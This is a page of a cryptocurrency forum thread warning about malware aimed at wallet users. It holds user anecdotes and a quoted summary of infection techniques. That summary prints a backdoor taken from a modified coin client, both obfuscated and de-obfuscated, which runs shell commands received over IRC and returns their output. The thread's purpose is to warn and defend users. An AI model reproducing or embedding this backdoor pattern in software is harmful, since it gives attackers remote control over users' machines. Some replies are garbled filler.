Pages:
Author

Topic: Beware of Increasingly Sophisticated Malware Infection Attempts - page 17. (Read 702024 times)

sr. member
Activity: 2226
Merit: 347
As much as we like freebies we should be careful of the application we install on our systems expecially hack copy of an application because most of the hacker want valuable information back from us which will give to them not knowing and my first BTC wallet balance was emptied because i save the private key and password on my desktop by Zbot/Zeus trojan. I learnt my lesson in hard way

This is why i dont really entrust any other file lockers or any other similar thing when storing up private keys and other relevant information into my wallet access details.It would be much better if they are stored up on a flash drive rather than on leaving it saved on a desktop pc. Its too risky yet once the pc being infected those informations can really leak out.
In just a minute, malware can easily infiltrate a personal computer and take away all personal information. I think we should use the computer only to do work related to Bitcoin. Other things to do on another computer. Simultaneously protect your personal account in various forms of security. It is important that everyone is always careful about the activities that people suspect on the Internet.
Having a separate computer is a good idea but we do all know that not all people do have the capability on having both which why most of us will really have single pc which be mainly used into our crypto works and save up files connected to it.
member
Activity: 1022
Merit: 10
different appeals as worsemen tries to work with the chance as capturing details of the login from the use of technicals on scripting as might to helps as trader to collects of information.
and the returns on excess as kept on request as they might wants to work of the wallet as displacing details within the new medium and put in the
request to transfer other peoples money with the altcoin wallet...

newbie
Activity: 112
Merit: 0
In just a minute, malware can easily infiltrate a personal computer and take away all personal information. I think we should use the computer only to do work related to Bitcoin. Other things to do on another computer. Simultaneously protect your personal account in various forms of security. It is important that everyone is always careful about the activities that people suspect on the Internet.
newbie
Activity: 238
Merit: 0
Yes, it is better not to store passwords in the browser and in the computer. I store it separately on a USB flash drive and on paper.
full member
Activity: 406
Merit: 106
in my case, IE11 was completely locked up and I had to be fast with the "end process" clicks. I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install.
newbie
Activity: 89
Merit: 0
Thanks that is realy serious i mean coping links would do that we all should be careful
sr. member
Activity: 532
Merit: 250
Omg, thanks for the information, I'm always very afraid of losing my data or getting a virus, just cured the computer from a miner who was almost six months mining on my computer ((
newbie
Activity: 62
Merit: 0
You know im really glad that im seeing this. I lost a bunch of money when https://coinsmarkets.com went down, and I felt like an idiot. Ive been in the space too long to be making noob mistakes like leaving your coins on the exchange, but at the same time. I've also been in the space for so long that i don't trust every random developer who makes a coin. With that said I still feel dumb for my choices not because I left coins in general but because the coins that i had on the exchange were coins that i had wallets installed for

Main point for this post is that were getting to the point where for those of us who really understand whats going on but arent software devs ourselves its scary AF to get into any of these non major platforms
full member
Activity: 351
Merit: 100
As much as we like freebies we should be careful of the application we install on our systems expecially hack copy of an application because most of the hacker want valuable information back from us which will give to them not knowing and my first BTC wallet balance was emptied because i save the private key and password on my desktop by Zbot/Zeus trojan. I learnt my lesson in hard way
newbie
Activity: 3
Merit: 0
Nice 👍 job against these malwares, fell victim on a couple of occasions and it not a nice experience. Good job 👏🏼 guys
newbie
Activity: 10
Merit: 0
Wow, I am really loving this platform.☺️😂😃😁
newbie
Activity: 19
Merit: 0
seeems very good
full member
Activity: 406
Merit: 106
Thanks this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.
jr. member
Activity: 182
Merit: 1
Thank you for letting us know this information it will really helps individual to secure their accounts. Just avoid the things you find suspicious.
newbie
Activity: 266
Merit: 0
Thanks for the information ...
But can you please give us the exact name of the coins ... Thank you !!!
newbie
Activity: 209
Merit: 0
Hello) At me the first purse has been cracked and now I am very cautious ... Has installed a firewall, whether it will help to protect savings ...?
newbie
Activity: 98
Merit: 0
Thanks this was very informative. and inform to us..
member
Activity: 125
Merit: 10
Information so useful that we can secure the wallet from the virus that will cause a big problem later therefore should be able to find the right solution to prevent it by making good security  Wink
member
Activity: 171
Merit: 10
In the past months, malware infection attempts on this forum has become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans is no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt Usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or a update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to now detections on virustotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering them fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
CFree(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
}
}
here is the source code with macros resolved:
Code:
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) {
std::string result = "";
while (!feof(buf))
if (fgets(pszName, sizeof(pszName), buf) != NULL)
result += pszName;
pclose(buf);
strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
if (strchr(pszName, '!'))
*strchr(pszName, '!') = '\0';
Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
}
}
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

Thanks for posting this.  There is always something that we have to look out for.
newbie
Activity: 3
Merit: 0
Very interesting read! Thanks!
Pages:
Jump to: